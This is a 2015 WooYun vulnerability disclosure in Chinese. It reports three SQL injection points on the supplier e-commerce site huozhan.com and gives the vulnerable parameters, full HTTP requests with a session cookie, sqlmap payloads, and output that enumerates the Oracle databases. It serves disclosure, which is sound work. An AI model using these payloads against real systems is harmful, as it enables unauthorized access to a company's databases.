p2p安全之货栈网注入漏洞打包 | wooyun-2015-0152906| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0152906

漏洞标题：p2p安全之货栈网注入漏洞打包

漏洞作者：路人甲

提交时间：2015-11-11 00:19

修复时间：2015-12-26 00:20

公开时间：2015-12-26 00:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

多个注入打包提交

详细说明：

作为零售业、超市行业的商品供应商，常常饱受超市的各种名目繁多的进店费、赞助费、广告费、条码费、堆头费、店庆费。。。，结算账期短则7天，长则60天。
货栈网是一种创新的电子商务交易模式平台，为供应商提供全新的营销方式，通过这个交易平台，货栈网帮助供应商发展店铺（销售渠道），商品价格、新品、促销、账户资金全部由供应商自主掌握，货栈网作为您的‘业务员’，按量取酬，供应商只需轻松注册、保证货真价实，即可获得区域内数百个店铺（买家）会员的青睐。
好了
说正事^_^
找了三枚注入（应该不止不深挖了）跟别人提交的不会重复吧
注入一：

http://www.huozhan.com:80/HelpAction_showNewsDeatil.do?areaCode=010BJ&newsId=8065

GET parameter 'areaCode' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 154 HTTP(s) requests:
---
Parameter: areaCode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: areaCode=010BJ' AND 6922=6922 AND 'skOh'='skOh&newsId=8065
---
[00:40:23] [INFO] testing MySQL
[00:40:23] [WARNING] the back-end DBMS is not MySQL
[00:40:24] [INFO] testing Oracle
[00:40:27] [INFO] confirming Oracle
[00:40:30] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:40:30] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMS
[00:40:30] [INFO] fetching database (schema) names
[00:40:30] [INFO] fetching number of databases
[00:40:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:40:30] [INFO] retrieved: 7
[00:40:36] [INFO] retrieved: HRZMART
[00:42:29] [INFO] retrieved: HUOZHAN
[00:44:25] [INFO] retrieved:
[00:44:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request(s)
OUTLN
[00:46:25] [INFO] retrieved: SHOP
[00:46:59] [INFO] retrieved: SYS
[00:47:20] [INFO] retrieved: SYSTEM
[00:48:07] [INFO] retrieved: WMSYS
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS

注入二：
post.txt

POST /SupplierItemCate_searchProductList.do?AREA_CODE=0317cz2&brand=3466&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008 
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AREA_CODE=0317cz2&categoryCode=&currPage=1&displayType=&ITEM_CODE=&searchValue=&SUPPLIER_CODE=73178008

GET parameter 'brand' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: brand (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: AREA_CODE=0317cz2&brand=3466 AND 5394=5394&categoryId=&myNews=myNews&searchValue=&SUPPLIER_CODE=73178008
---
[00:58:06] [INFO] testing MySQL
[00:58:09] [WARNING] the back-end DBMS is not MySQL
[00:58:09] [INFO] testing Oracle
[00:58:10] [INFO] confirming Oracle
[00:58:20] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[00:58:20] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[00:58:20] [INFO] fetching database (schema) names
[00:58:20] [INFO] fetching number of databases
[00:58:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:58:20] [INFO] retrieved:

注入三：
post.txt

POST /LogonAction_zjsave.do HTTP/1.1
Content-Length: 351
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.huozhan.com:80/
Cookie: JSESSIONID=E7A86CA57388B857EDDEF7EE32C79B76
Host: www.huozhan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANATION=11/2011&IMAGE_NAME=ichtjtwy&MEMBER_CODE=492091&MEMBER_TYPE=2&PROMULGATION=1&ssp=1&tj=%e5%ae%8c%e6%88%90&tj=%e7%bb%a7%e7%bb%ad%e6%b7%bb%e5%8a%a0&upload=%e4%b8%8a%e4%bc%a0%e5%9b%be%e7%89%87

POST parameter 'MEMBER_CODE' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 105 HTTP(s) requests:
---
Parameter: MEMBER_CODE (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: ACTIVATION_DATE=01/01/1967&AREA_CODE=010BJ&CREDENTIAL_NAME=ichtjtwy&CREDENTIAL_TYPE=3&END_DATE=01/01/1967&EXPLANAT
3)||CHR(111)||CHR(97)||CHR(114)||CHR(84)||CHR(87)||CHR(82)||CHR(112)||CHR(109)||CHR(106)||CHR(101)||CHR(77)||CHR(86)||CHR(109)|
R(108)||CHR(84)||CHR(118)||CHR(109)||CHR(85)||CHR(113)||CHR(98)||CHR(107)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL FROM DUA
---
[01:22:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:22:58] [INFO] the back-end DBMS is Oracle
web application technology: Nginx
back-end DBMS: Oracle
[01:22:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other
[01:22:58] [INFO] fetching database (schema) names
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS

漏洞证明：

涉及7个数据库：（dba）

主库469个表：

太慢就不深入了、、、、、

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝